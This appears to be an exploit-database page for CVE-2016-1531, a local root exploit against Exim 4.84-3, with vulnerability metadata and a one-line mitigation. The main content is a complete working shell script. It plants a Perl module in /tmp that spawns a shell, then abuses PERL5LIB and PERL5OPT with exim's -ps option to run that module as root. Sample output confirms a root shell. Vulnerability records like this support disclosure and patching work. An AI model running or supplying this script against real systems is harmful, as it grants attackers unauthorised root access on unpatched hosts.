header-logo
Suggest Exploit
vendor:
Exim
by:
Hacker Fantastic
7
CVSS
HIGH
Local Root Exploit
264
CWE
Product Name: Exim
Affected Version From: 4.84-3
Affected Version To: 4.84-3
Patch Exists: YES
Related CWE: CVE-2016-1531
CPE: exim
Metasploit: https://www.rapid7.com/db/vulnerabilities/exim-cve-2016-1531/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-1531/https://www.rapid7.com/db/vulnerabilities/debian-cve-2016-1531/https://www.rapid7.com/db/vulnerabilities/suse-cve-2016-1531/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-7d09b9ee-e0ba-11e5-abc4-6fb07af136d2/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2016

CVE-2016-1531 exim <= 4.84-3 local root exploit

This exploit allows an attacker to write files as root or force a perl module to load by manipulating the perl environment and running exim with the 'perl_startup' argument -ps.

Mitigation:

Ensure that the latest version of Exim is installed and that all security patches are applied.
Source

Exploit-DB raw data:

#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps. 
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh 
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
# 
# -- Hacker Fantastic 
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;

system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

Navigation

Suggest Exploit

Services By CQR